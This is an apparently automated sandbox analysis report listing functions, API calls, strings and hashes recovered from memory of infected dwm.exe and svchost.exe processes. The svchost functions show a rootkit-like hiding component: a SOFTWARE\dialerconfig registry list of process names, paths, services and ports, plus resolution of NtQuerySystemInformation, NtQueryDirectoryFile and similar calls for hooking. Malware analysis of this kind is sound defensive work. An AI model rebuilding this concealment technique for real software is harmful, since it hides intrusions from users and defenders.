Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction ID: 7fe8a3023fbf63a109a775d972edc43dc64ebbba23531ec79d381b4c86bcf792
Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction Fuzzy Hash: 1451EC32B0878D82EA749E2E9D5C3BA66F1F385788F164025DD8A03B9DCE37C545CB58

Function 0000026DB15D0604 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 0000026DB15D071B
GetLastError.KERNEL32 ref: 0000026DB15D073D

Strings

U, xrefs: 0000026DB15D06C7

Memory Dump Source

Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction ID: 2f1d578e736c1af2fcfea885247b938db3b9114df529238055782ab624d4cc50
Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction Fuzzy Hash: FE41C572B14A8881EB609F26E8487A967F0F388788F524025EE4D87788DB3DC541CB54

Function 0000026DB15CD6C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 0000026DB15CD6F9
LCMapStringW.KERNEL32 ref: 0000026DB15CD781

Strings

LCMapStringEx, xrefs: 0000026DB15CD6DC, 0000026DB15CD6ED

Memory Dump Source

Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd

Similarity

API ID: Stringtry_get_function
String ID: LCMapStringEx
API String ID: 2588686239-3893581201
Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction ID: a76b8c8ad337a3a2ab9f85481b7c48fa0d793d4e7661abcdd77c5af87ab95b2b
Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction Fuzzy Hash: 3D112476B08BC486D7608F56B8846AAB7B0F7C8B94F544126EACD83B19DF38C5408B44

Function 0000026DB15C94A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 0000026DB15C94E8
RaiseException.KERNEL32 ref: 0000026DB15C952E

Strings

csm, xrefs: 0000026DB15C951B

Memory Dump Source

Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction ID: caa9825c6ec86e3645267b59d36000ce5d10e7e37a7d4ede0e55ded8350a6dd5
Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction Fuzzy Hash: 69114C32608B8482EB608F15E944669B7F0FB88B98F194224DF8D07B6CDF39C551CB04

Function 0000026DB15CD65C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 0000026DB15CD68D
InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 0000026DB15CD6A7

Strings

InitializeCriticalSectionEx, xrefs: 0000026DB15CD681

Memory Dump Source

Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpintry_get_function
String ID: InitializeCriticalSectionEx
API String ID: 539475747-3084827643
Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction ID: 587b03e066507e27a2cc6418c0ad798b0a59bd8609577f6e116a4b883512ba9d
Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction Fuzzy Hash: 31F0E271B107C882E704AF42FC08AB863B1AB88B98F5A4025A94D43F1CCF3AC994C748

Function 0000026DB159CB9C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 0000026DB159CBC5

Strings

November, xrefs: 0000026DB159CBA8, 0000026DB159CBB2
October, xrefs: 0000026DB159CBBE

Memory Dump Source

Source File: 00000018.00000002.2743999833.0000026DB1590000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB1590000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_26db1590000_dwm.jbxd

Similarity

API ID: try_get_function
String ID: November$October
API String ID: 2742660187-1636048786
Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction ID: 1bced809de21fde734ac46eb86d86b9b448842b7e90fb430b4d9a2b3bcff799d
Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction Fuzzy Hash: 21E09271B5454D92EB059B95FC493F432F1DB8478CF9F502295190629ECF3ED88A8349

Function 0000026DB15FCB9C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 0000026DB15FCBC5

Strings

November, xrefs: 0000026DB15FCBA8, 0000026DB15FCBB2
October, xrefs: 0000026DB15FCBBE

Memory Dump Source

Source File: 00000018.00000002.2744284775.0000026DB15F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000026DB15F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_26db15f0000_dwm.jbxd

Similarity

API ID: try_get_function
String ID: November$October
API String ID: 2742660187-1636048786
Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction ID: f329ed48cda910d1b7dccd4698561394fa6ac53ca001f7378eaa8a04ca404730
Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction Fuzzy Hash: FBE09231F0454E92EA15AB55FC8C6F423B19B8874CF9B503596190665ECF3EC8868384

Function 0000026DB15CD608 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 0000026DB15CD631
TlsSetValue.KERNEL32 ref: 0000026DB15CD648

Strings

FlsSetValue, xrefs: 0000026DB15CD61E

Memory Dump Source

Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd

Similarity

API ID: Valuetry_get_function
String ID: FlsSetValue
API String ID: 738293619-3750699315
Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction ID: 6b6b39cb39279c3414cc443775f1bfc165196f042fadc3edab264f41cbfc9013
Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction Fuzzy Hash: 9FE09BF1B0068891FB045F56FC0CAB463B2FBC8788F5A4021D5094675DCE3AC995C748

Function 0000026DB15C1D60 Relevance: 5.1, APIs: 4, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000026DB15C1D9B
HeapAlloc.KERNEL32 ref: 0000026DB15C1DAA
GetProcessHeap.KERNEL32 ref: 0000026DB15C1E1E
HeapFree.KERNEL32 ref: 0000026DB15C1E2C

Memory Dump Source

Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction ID: 91bad54cf706a528f3d7b59dd7dfb6b881c8f68eb258a3e7e2ff5a4ef3a2242f
Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction Fuzzy Hash: 8A21A932B04BC4C5EB518F6AE84826AF7F0FB84B98F564110DE8C87B19EF79C5428704

Function 0000026DB15C1274 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0000026DB15C127A
HeapAlloc.KERNEL32 ref: 0000026DB15C1289
GetProcessHeap.KERNEL32 ref: 0000026DB15C12A3
HeapAlloc.KERNEL32 ref: 0000026DB15C12B4

Memory Dump Source

Source File: 00000018.00000002.2744116922.0000026DB15C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026DB15C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_26db15c0000_dwm.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction ID: 4598a9b009fa944969a357c0f1fb729c989a90bcc4bc2a47c281c442831e5a2c
Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction Fuzzy Hash: 5EE039B1B11645C6E7448BB3D8087693AF1EB88B05F4A8024C90907354DF7E8599C740

Analysis Process: svchost.exePID: 364, Parent PID: 8080COMMON

Execution Graph

Execution Coverage:	0.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	81
Total number of Limit Nodes:	2

Executed Functions

Function 000002A3F0661650 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 000002A3F066165B
HeapAlloc.KERNEL32 ref: 000002A3F066166A

Part of subcall function 000002A3F0661274: GetProcessHeap.KERNEL32 ref: 000002A3F066127A
Part of subcall function 000002A3F0661274: HeapAlloc.KERNEL32 ref: 000002A3F0661289
Part of subcall function 000002A3F0661274: GetProcessHeap.KERNEL32 ref: 000002A3F06612A3
Part of subcall function 000002A3F0661274: HeapAlloc.KERNEL32 ref: 000002A3F06612B4

RegOpenKeyExW.ADVAPI32 ref: 000002A3F06616DA
RegOpenKeyExW.ADVAPI32 ref: 000002A3F0661707
RegCloseKey.ADVAPI32 ref: 000002A3F0661721
RegOpenKeyExW.ADVAPI32 ref: 000002A3F0661741
RegCloseKey.ADVAPI32 ref: 000002A3F066175C
RegOpenKeyExW.ADVAPI32 ref: 000002A3F066177C
RegCloseKey.ADVAPI32 ref: 000002A3F0661797
RegOpenKeyExW.ADVAPI32 ref: 000002A3F06617B7
RegCloseKey.ADVAPI32 ref: 000002A3F06617D2
RegOpenKeyExW.ADVAPI32 ref: 000002A3F06617F2
RegCloseKey.ADVAPI32 ref: 000002A3F066180D
RegOpenKeyExW.ADVAPI32 ref: 000002A3F066182D
RegCloseKey.ADVAPI32 ref: 000002A3F0661848
RegOpenKeyExW.ADVAPI32 ref: 000002A3F0661868
RegCloseKey.ADVAPI32 ref: 000002A3F0661883
RegOpenKeyExW.ADVAPI32 ref: 000002A3F06618A3
RegCloseKey.ADVAPI32 ref: 000002A3F06618BE
RegCloseKey.ADVAPI32 ref: 000002A3F06618C8

Part of subcall function 000002A3F06612C8: RegQueryInfoKeyW.ADVAPI32 ref: 000002A3F0661326
Part of subcall function 000002A3F06612C8: GetProcessHeap.KERNEL32 ref: 000002A3F0661334
Part of subcall function 000002A3F06612C8: HeapAlloc.KERNEL32 ref: 000002A3F0661345
Part of subcall function 000002A3F06612C8: RegEnumValueW.ADVAPI32 ref: 000002A3F06613A1
Part of subcall function 000002A3F06612C8: GetProcessHeap.KERNEL32 ref: 000002A3F06613E9
Part of subcall function 000002A3F06612C8: HeapAlloc.KERNEL32 ref: 000002A3F06613F7
Part of subcall function 000002A3F06612C8: GetProcessHeap.KERNEL32 ref: 000002A3F066141B
Part of subcall function 000002A3F06612C8: HeapFree.KERNEL32 ref: 000002A3F0661429
Part of subcall function 000002A3F06612C8: lstrlenW.KERNEL32 ref: 000002A3F0661432
Part of subcall function 000002A3F06612C8: GetProcessHeap.KERNEL32 ref: 000002A3F0661440
Part of subcall function 000002A3F06612C8: HeapAlloc.KERNEL32 ref: 000002A3F066144E

Strings

tcp_remote, xrefs: 000002A3F0661861
udp, xrefs: 000002A3F066189C
startup, xrefs: 000002A3F06616FD
tcp_local, xrefs: 000002A3F0661826
service_names, xrefs: 000002A3F06617EB
paths, xrefs: 000002A3F06617B0
process_names, xrefs: 000002A3F0661775
SOFTWARE\dialerconfig, xrefs: 000002A3F06616BA
pid, xrefs: 000002A3F066173A

Memory Dump Source

Source File: 0000001A.00000002.2687168964.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2a3f0660000_svchost.jbxd

Similarity

API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 106492572-2879589442
Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction ID: f79c5404dba2c7bcefd76c4e133409882d967ce8ed856d3d4bdd2f0356d62ee4
Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction Fuzzy Hash: EB710036B20A508BEB90DF69EC5865D67A4F7A7B88F441121EE4D8BF68EF34C644C341

Function 000002A3F0663458 Relevance: 4.5, APIs: 3, Instructions: 43
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 000002A3F066347A
PathFindFileNameW.SHLWAPI ref: 000002A3F0663489

Part of subcall function 000002A3F0663930: StrCmpNIW.SHLWAPI ref: 000002A3F0663948

Part of subcall function 000002A3F0663878: GetModuleHandleW.KERNEL32 ref: 000002A3F0663886
Part of subcall function 000002A3F0663878: GetCurrentProcess.KERNEL32 ref: 000002A3F06638B4
Part of subcall function 000002A3F0663878: VirtualProtectEx.KERNEL32 ref: 000002A3F06638D6
Part of subcall function 000002A3F0663878: GetCurrentProcess.KERNEL32 ref: 000002A3F06638F4
Part of subcall function 000002A3F0663878: VirtualProtectEx.KERNEL32 ref: 000002A3F0663915

CreateThread.KERNEL32 ref: 000002A3F06634D7

Part of subcall function 000002A3F0661EB4: GetCurrentThread.KERNEL32 ref: 000002A3F0661EBF

Memory Dump Source

Source File: 0000001A.00000002.2687168964.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2a3f0660000_svchost.jbxd

Similarity

API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
String ID:
API String ID: 1683269324-0
Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction ID: ad3bb7409650a392eb3da378421f2964571fa5578442e1310fd7327ca73c4980
Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction Fuzzy Hash: 9F111561F306618BF7A1D729AE0E75D62D1EBBB308F440039BA16C9994FF3DC2488602

Function 000002A3F0661C28 Relevance: 3.1, APIs: 2, Instructions: 68
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000002A3F0661650: GetProcessHeap.KERNEL32 ref: 000002A3F066165B
Part of subcall function 000002A3F0661650: HeapAlloc.KERNEL32 ref: 000002A3F066166A
Part of subcall function 000002A3F0661650: RegOpenKeyExW.ADVAPI32 ref: 000002A3F06616DA
Part of subcall function 000002A3F0661650: RegOpenKeyExW.ADVAPI32 ref: 000002A3F0661707
Part of subcall function 000002A3F0661650: RegCloseKey.ADVAPI32 ref: 000002A3F0661721
Part of subcall function 000002A3F0661650: RegOpenKeyExW.ADVAPI32 ref: 000002A3F0661741
Part of subcall function 000002A3F0661650: RegCloseKey.ADVAPI32 ref: 000002A3F066175C
Part of subcall function 000002A3F0661650: RegOpenKeyExW.ADVAPI32 ref: 000002A3F066177C
Part of subcall function 000002A3F0661650: RegCloseKey.ADVAPI32 ref: 000002A3F0661797
Part of subcall function 000002A3F0661650: RegOpenKeyExW.ADVAPI32 ref: 000002A3F06617B7
Part of subcall function 000002A3F0661650: RegCloseKey.ADVAPI32 ref: 000002A3F06617D2
Part of subcall function 000002A3F0661650: RegOpenKeyExW.ADVAPI32 ref: 000002A3F06617F2

Sleep.KERNEL32 ref: 000002A3F0661C43
SleepEx.KERNELBASE ref: 000002A3F0661C49

Part of subcall function 000002A3F0661650: RegCloseKey.ADVAPI32 ref: 000002A3F066180D
Part of subcall function 000002A3F0661650: RegOpenKeyExW.ADVAPI32 ref: 000002A3F066182D
Part of subcall function 000002A3F0661650: RegCloseKey.ADVAPI32 ref: 000002A3F0661848
Part of subcall function 000002A3F0661650: RegOpenKeyExW.ADVAPI32 ref: 000002A3F0661868
Part of subcall function 000002A3F0661650: RegCloseKey.ADVAPI32 ref: 000002A3F0661883
Part of subcall function 000002A3F0661650: RegOpenKeyExW.ADVAPI32 ref: 000002A3F06618A3
Part of subcall function 000002A3F0661650: RegCloseKey.ADVAPI32 ref: 000002A3F06618BE
Part of subcall function 000002A3F0661650: RegCloseKey.ADVAPI32 ref: 000002A3F06618C8

Memory Dump Source

Source File: 0000001A.00000002.2687168964.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2a3f0660000_svchost.jbxd

Similarity

API ID: CloseOpen$HeapSleep$AllocProcess
String ID:
API String ID: 1534210851-0
Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction ID: afe1bd0adbe0fdb1014eaf2c2c977f5ae0a942446c788d3fc9d3ad709c21c3e3
Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction Fuzzy Hash: EE31DF65B206019BFAD0DF2ADE5935D1295EB67BC5F0C4031BE09CFE96FE34CA508292

Function 000002A3EFFC2908 Relevance: 1.7, APIs: 1, Instructions: 186
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 000002A3EFFC2A31

Memory Dump Source

Source File: 0000001A.00000002.2679417538.000002A3EFFC0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3EFFC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2a3effc0000_svchost.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction ID: cefa9eae0214541e315f9d9b4dfc71c09d09727c694922c7fd46a5f5038a8511
Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction Fuzzy Hash: 6861333270126187EB68CF15D64876CB391FF85B94F148023EA1987795DF78EA53C70A

Non-executed Functions

Function 000002A3F0662CDC Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264
stringlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 000002A3F0662D80
lstrlenW.KERNEL32 ref: 000002A3F0662FBA

Part of subcall function 000002A3F0661A14: OpenProcess.KERNEL32 ref: 000002A3F0661A3A
Part of subcall function 000002A3F0661A14: K32GetModuleFileNameExW.KERNEL32 ref: 000002A3F0661A58
Part of subcall function 000002A3F0661A14: PathFindFileNameW.SHLWAPI ref: 000002A3F0661A67
Part of subcall function 000002A3F0661A14: lstrlenW.KERNEL32 ref: 000002A3F0661A73
Part of subcall function 000002A3F0661A14: StrCpyW.SHLWAPI ref: 000002A3F0661A86
Part of subcall function 000002A3F0661A14: CloseHandle.KERNEL32 ref: 000002A3F0661A94

GetProcAddress.KERNEL32 ref: 000002A3F0662D95

Part of subcall function 000002A3F0661554: StrCmpIW.SHLWAPI ref: 000002A3F0661585

Part of subcall function 000002A3F0663930: StrCmpNIW.SHLWAPI ref: 000002A3F0663948

StrCmpNIW.SHLWAPI ref: 000002A3F0662DD8
lstrlenW.KERNEL32 ref: 000002A3F0662F00

Strings

ntdll.dll, xrefs: 000002A3F0662D79
\Device\Nsi, xrefs: 000002A3F0662DCB
NtQueryObject, xrefs: 000002A3F0662D8B

Memory Dump Source

Source File: 0000001A.00000002.2687168964.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2a3f0660000_svchost.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction ID: 33aced8475daf3e94686e5112e81de38feec59a113ea034f96cd00b206f4b55a
Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction Fuzzy Hash: 38B18022B20A518BEB94CF29C94879D63A4F767B88F445036FE099BF94FE35CA44C341

Function 000002A3F0667E70 Relevance: 10.6, APIs: 7, Instructions: 72
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 000002A3F0667E8C
RtlCaptureContext.NTDLL ref: 000002A3F0667EB9
RtlLookupFunctionEntry.NTDLL ref: 000002A3F0667ED3
RtlVirtualUnwind.NTDLL ref: 000002A3F0667F14
IsDebuggerPresent.KERNEL32 ref: 000002A3F0667F68
SetUnhandledExceptionFilter.KERNEL32 ref: 000002A3F0667F89
UnhandledExceptionFilter.KERNEL32 ref: 000002A3F0667F94

Memory Dump Source

Source File: 0000001A.00000002.2687168964.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2a3f0660000_svchost.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction ID: 6cb2840dcff15ca21440fafa695f21f01824cfde566a05628f86f002d40ceb9b
Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction Fuzzy Hash: 39315D72714B808AEBA0CF64E8547ED73A0F796744F44442AEA4D87B99EF38C648C711

Function 000002A3F066B50C Relevance: 9.1, APIs: 6, Instructions: 83COMMON

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 000002A3F066B585
RtlLookupFunctionEntry.NTDLL ref: 000002A3F066B59D
RtlVirtualUnwind.NTDLL ref: 000002A3F066B5D8
IsDebuggerPresent.KERNEL32 ref: 000002A3F066B611
SetUnhandledExceptionFilter.KERNEL32 ref: 000002A3F066B61B
UnhandledExceptionFilter.KERNEL32 ref: 000002A3F066B626

Memory Dump Source

Source File: 0000001A.00000002.2687168964.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2a3f0660000_svchost.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction ID: fa72f90d328a0edf74a53976890cb7dbdf4481ab8c5f52fb664a1e7f445233cf
Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction Fuzzy Hash: E6315E32724B808ADBA0CF29E85439E73A4F79A754F500126EA9D87B95EF38C6458B01

Function 000002A3F066FEF8 Relevance: 7.8, APIs: 5, Instructions: 328fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 000002A3F066FF67
WriteFile.KERNEL32 ref: 000002A3F067021E
WriteFile.KERNEL32 ref: 000002A3F0670270
GetLastError.KERNEL32 ref: 000002A3F0670372
GetLastError.KERNEL32 ref: 000002A3F06703D2

Memory Dump Source

Source File: 0000001A.00000002.2687168964.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2a3f0660000_svchost.jbxd

Similarity

API ID: ErrorFileLastWrite$ConsoleOutput
String ID:
API String ID: 1443284424-0
Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction ID: cce8f234377bda62cc7a1b4833b5512b5b5e5b4352741d0832b44603d9de0214
Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction Fuzzy Hash: D9E1CE32B24A809FE740CF68D88829D7BB1F357798F544126EE4A97F99EE34C616C701

Function 000002A3F06612C8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000002A3F0661326
GetProcessHeap.KERNEL32 ref: 000002A3F0661334
HeapAlloc.KERNEL32 ref: 000002A3F0661345
RegEnumValueW.ADVAPI32 ref: 000002A3F06613A1

Part of subcall function 000002A3F0661554: StrCmpIW.SHLWAPI ref: 000002A3F0661585

GetProcessHeap.KERNEL32 ref: 000002A3F06613E9
HeapAlloc.KERNEL32 ref: 000002A3F06613F7
GetProcessHeap.KERNEL32 ref: 000002A3F066141B
HeapFree.KERNEL32 ref: 000002A3F0661429
lstrlenW.KERNEL32 ref: 000002A3F0661432
GetProcessHeap.KERNEL32 ref: 000002A3F0661440
HeapAlloc.KERNEL32 ref: 000002A3F066144E
StrCpyW.SHLWAPI ref: 000002A3F0661470
GetProcessHeap.KERNEL32 ref: 000002A3F0661485
HeapFree.KERNEL32 ref: 000002A3F0661493

Strings

d, xrefs: 000002A3F0661365

Memory Dump Source

Source File: 0000001A.00000002.2687168964.000002A3F0660000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A3F0660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2a3f0660000_svchost.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction ID: ef86474c76c9eaad6ed299eb49a50b885eaf0495ca8c34782cc922886f71be1a
Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction Fuzzy Hash: 5A518E72B24B54DBEB50CF66E94839E73A1F39AB80F444124EA498BF14EF38C255C701

Function 000002A3F0661EB4 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 000002A3F0661EBF

Part of subcall function 000002A3F0662174: GetModuleHandleA.KERNEL32 ref: 000002A3F066218C
Part of subcall function 000002A3F0662174: GetProcAddress.KERNEL32 ref: 000002A3F066219D

Part of subcall function 000002A3F0665C10: GetCurrentThreadId.KERNEL32 ref: 000002A3F0665C4B

Strings

NtQueryDirectoryFile, xrefs: 000002A3F0661F1F
ntdll.dll, xrefs: 000002A3F0661ECD
advapi32.dll, xrefs: 000002A3F0661F97, 000002A3F0661FB8
NtEnumerateValueKey, xrefs: 000002A3F0661F76
sechost.dll, xrefs: 000002A3F0661FD9
NtQuerySystemInformation, xrefs: 000002A3F0661EE5
NtQueryDirectoryFileEx, xrefs: 000002A3F0661F3C
NtEnumerateKey, xrefs: 000002A3F0661F59
NtResumeThread, xrefs: 000002A3F0661F02
EnumServicesStatusExW, xrefs: 000002A3F0661FB1, 000002A3F0661FD2
NtDeviceIoControlFile, xrefs: 000002A3F0661FF6
EnumServiceGroupW, xrefs: 000002A3F0661F90

Memory Dump Source

